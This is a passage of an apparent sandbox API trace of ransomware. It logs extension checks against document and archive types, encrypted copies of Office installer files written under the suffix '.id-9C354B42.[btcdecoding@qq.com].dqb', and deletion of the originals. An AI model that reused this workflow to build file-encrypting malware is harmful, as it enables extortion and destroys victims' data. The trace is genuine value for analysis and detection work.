(lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0038.541] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0038.541] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0038.541] lstrlenW (lpString=".doc") returned 4 [0038.541] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0038.541] lstrlenW (lpString=".docx") returned 5 [0038.541] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0038.541] lstrlenW (lpString=".pdf") returned 4 [0038.541] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0038.541] lstrlenW (lpString=".xls") returned 4 [0038.541] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0038.541] lstrlenW (lpString=".xlsx") returned 5 [0038.541] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0038.541] lstrlenW (lpString=".ppt") returned 4 [0038.541] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0038.541] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0038.541] lstrlenW (lpString=".zip") returned 4 [0038.541] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0038.541] lstrlenW (lpString=".rar") returned 4 [0038.541] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0038.541] lstrlenW (lpString=".bz2") returned 4 [0038.541] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0038.541] lstrlenW (lpString=".7z") returned 3 [0038.541] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0038.541] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0038.541] lstrlenW (lpString=".dbf") returned 4 [0038.541] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0038.541] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0038.541] lstrlenW (lpString=".1cd") returned 4 [0038.541] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0038.541] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0038.542] lstrlenW (lpString=".jpg") returned 4 [0038.542] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0038.542] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0038.542] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0038.542] lstrlenW (lpString=".doc") returned 4 [0038.542] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0038.542] lstrlenW (lpString=".docx") returned 5 [0038.542] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0038.542] lstrlenW (lpString=".pdf") returned 4 [0038.542] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0038.542] lstrlenW (lpString=".xls") returned 4 [0038.542] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0038.542] lstrlenW (lpString=".xlsx") returned 5 [0038.542] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0038.542] lstrlenW (lpString=".ppt") returned 4 [0038.542] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0038.542] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0038.542] lstrlenW (lpString=".zip") returned 4 [0038.542] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0038.542] lstrlenW (lpString=".rar") returned 4 [0038.542] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0038.542] lstrlenW (lpString=".bz2") returned 4 [0038.542] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0038.542] lstrlenW (lpString=".7z") returned 3 [0038.542] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0038.542] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0038.542] lstrlenW (lpString=".dbf") returned 4 [0038.542] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0038.542] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0038.542] lstrlenW (lpString=".1cd") returned 4 [0038.542] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0038.542] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0038.542] lstrlenW (lpString=".jpg") returned 4 [0038.542] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0038.543] lstrcmpiW (lpString1=".msi", lpString2=".dqb") returned 1 [0038.543] lstrlenW (lpString="Proof.msi") returned 9 [0038.543] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0038.543] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=875520) returned 1 [0038.543] CloseHandle (hObject=0x178) returned 1 [0038.543] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi")) returned 0x2020 [0038.543] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0038.543] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0038.543] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.543] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.543] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0038.543] GetLastError () returned 0x0 [0038.544] ReadFile (in: hFile=0x178, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0xd5c00, lpOverlapped=0x0) returned 1 [0038.776] WriteFile (in: hFile=0x1bc, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xd5c10, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0xd5c10, lpOverlapped=0x0) returned 1 [0039.152] ReadFile (in: hFile=0x178, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0x0, lpOverlapped=0x0) returned 1 [0039.152] WriteFile (in: hFile=0x1bc, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0039.152] SetEndOfFile (hFile=0x1bc) returned 1 [0039.152] CloseHandle (hObject=0x1bc) returned 1 [0039.159] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.159] SetEndOfFile (hFile=0x178) returned 1 [0039.166] CloseHandle (hObject=0x178) returned 1 [0039.166] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0039.166] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi")) returned 1 [0039.167] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0039.167] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0039.167] lstrlenW (lpString=".doc") returned 4 [0039.167] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0039.167] lstrlenW (lpString=".docx") returned 5 [0039.167] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1 [0039.167] lstrlenW (lpString=".pdf") returned 4 [0039.167] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0039.167] lstrlenW (lpString=".xls") returned 4 [0039.167] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0039.167] lstrlenW (lpString=".xlsx") returned 5 [0039.167] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1 [0039.167] lstrlenW (lpString=".ppt") returned 4 [0039.167] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0039.167] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0039.167] lstrlenW (lpString=".zip") returned 4 [0039.167] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0039.167] lstrlenW (lpString=".rar") returned 4 [0039.167] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0039.167] lstrlenW (lpString=".bz2") returned 4 [0039.167] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0039.167] lstrlenW (lpString=".7z") returned 3 [0039.167] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0039.167] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0039.167] lstrlenW (lpString=".dbf") returned 4 [0039.167] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0039.167] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0039.167] lstrlenW (lpString=".1cd") returned 4 [0039.167] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0039.167] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0039.167] lstrlenW (lpString=".jpg") returned 4 [0039.168] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0039.168] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0039.168] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0039.168] lstrlenW (lpString=".doc") returned 4 [0039.168] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0039.168] lstrlenW (lpString=".docx") returned 5 [0039.168] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1 [0039.168] lstrlenW (lpString=".pdf") returned 4 [0039.168] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0039.168] lstrlenW (lpString=".xls") returned 4 [0039.168] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0039.168] lstrlenW (lpString=".xlsx") returned 5 [0039.168] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1 [0039.168] lstrlenW (lpString=".ppt") returned 4 [0039.168] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0039.168] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0039.168] lstrlenW (lpString=".zip") returned 4 [0039.168] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0039.168] lstrlenW (lpString=".rar") returned 4 [0039.168] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0039.168] lstrlenW (lpString=".bz2") returned 4 [0039.168] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0039.168] lstrlenW (lpString=".7z") returned 3 [0039.168] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0039.168] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0039.168] lstrlenW (lpString=".dbf") returned 4 [0039.168] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0039.168] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0039.168] lstrlenW (lpString=".1cd") returned 4 [0039.168] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0039.168] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0039.168] lstrlenW (lpString=".jpg") returned 4 [0039.168] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0039.169] lstrcmpiW (lpString1=".msi", lpString2=".dqb") returned 1 [0039.169] lstrlenW (lpString="Proof.msi") returned 9 [0039.169] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0039.169] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=881152) returned 1 [0039.169] CloseHandle (hObject=0x178) returned 1 [0039.169] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi")) returned 0x2020 [0039.169] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0039.169] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0039.169] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.169] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.169] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0039.170] GetLastError () returned 0x0 [0039.170] ReadFile (in: hFile=0x178, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0xd7200, lpOverlapped=0x0) returned 1 [0039.186] WriteFile (in: hFile=0x1bc, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xd7210, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0xd7210, lpOverlapped=0x0) returned 1 [0039.664] ReadFile (in: hFile=0x178, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0x0, lpOverlapped=0x0) returned 1 [0039.664] WriteFile (in: hFile=0x1bc, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0039.664] SetEndOfFile (hFile=0x1bc) returned 1 [0039.664] CloseHandle (hObject=0x1bc) returned 1 [0039.695] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.695] SetEndOfFile (hFile=0x178) returned 1 [0039.702] CloseHandle (hObject=0x178) returned 1 [0039.702] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0039.702] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi")) returned 1 [0039.703] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0039.703] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0039.703] lstrlenW (lpString=".doc") returned 4 [0039.703] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0039.703] lstrlenW (lpString=".docx") returned 5 [0039.703] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1 [0039.703] lstrlenW (lpString=".pdf") returned 4 [0039.703] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0039.703] lstrlenW (lpString=".xls") returned 4 [0039.703] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0039.703] lstrlenW (lpString=".xlsx") returned 5 [0039.703] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1 [0039.703] lstrlenW (lpString=".ppt") returned 4 [0039.703] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0039.703] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0039.703] lstrlenW (lpString=".zip") returned 4 [0039.703] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0039.703] lstrlenW (lpString=".rar") returned 4 [0039.703] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0039.703] lstrlenW (lpString=".bz2") returned 4 [0039.703] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0039.703] lstrlenW (lpString=".7z") returned 3 [0039.703] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0039.703] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0039.703] lstrlenW (lpString=".dbf") returned 4 [0039.703] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0039.703] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0039.703] lstrlenW (lpString=".1cd") returned 4 [0039.703] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0039.703] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0039.703] lstrlenW (lpString=".jpg") returned 4 [0039.703] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0039.704] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0039.704] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0039.704] lstrlenW (lpString=".doc") returned 4 [0039.704] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0039.704] lstrlenW (lpString=".docx") returned 5 [0039.704] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1 [0039.704] lstrlenW (lpString=".pdf") returned 4 [0039.704] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0039.704] lstrlenW (lpString=".xls") returned 4 [0039.704] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0039.704] lstrlenW (lpString=".xlsx") returned 5 [0039.704] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1 [0039.704] lstrlenW (lpString=".ppt") returned 4 [0039.704] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0039.704] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0039.704] lstrlenW (lpString=".zip") returned 4 [0039.704] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0039.704] lstrlenW (lpString=".rar") returned 4 [0039.704] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0039.704] lstrlenW (lpString=".bz2") returned 4 [0039.704] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0039.704] lstrlenW (lpString=".7z") returned 3 [0039.704] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0039.704] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0039.704] lstrlenW (lpString=".dbf") returned 4 [0039.704] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0039.704] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0039.704] lstrlenW (lpString=".1cd") returned 4 [0039.704] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0039.704] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0039.704] lstrlenW (lpString=".jpg") returned 4 [0039.704] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0039.705] lstrcmpiW (lpString1=".cab", lpString2=".dqb") returned -1 [0039.705] lstrlenW (lpString="Proof.cab") returned 9 [0039.705] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0039.705] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=21064532) returned 1 [0039.705] CloseHandle (hObject=0x178) returned 1 [0039.705] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab")) returned 0x2020 [0039.705] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0039.705] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0040.151] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0040.151] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc6c | out: lpNewFilePointer=0x0) returned 1 [0040.151] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0040.151] ReadFile (in: hFile=0x1e4, lpBuffer=0x3650058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x3650058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0040.306] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x6b23c6, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0040.306] ReadFile (in: hFile=0x1e4, lpBuffer=0x3690058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x3690058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 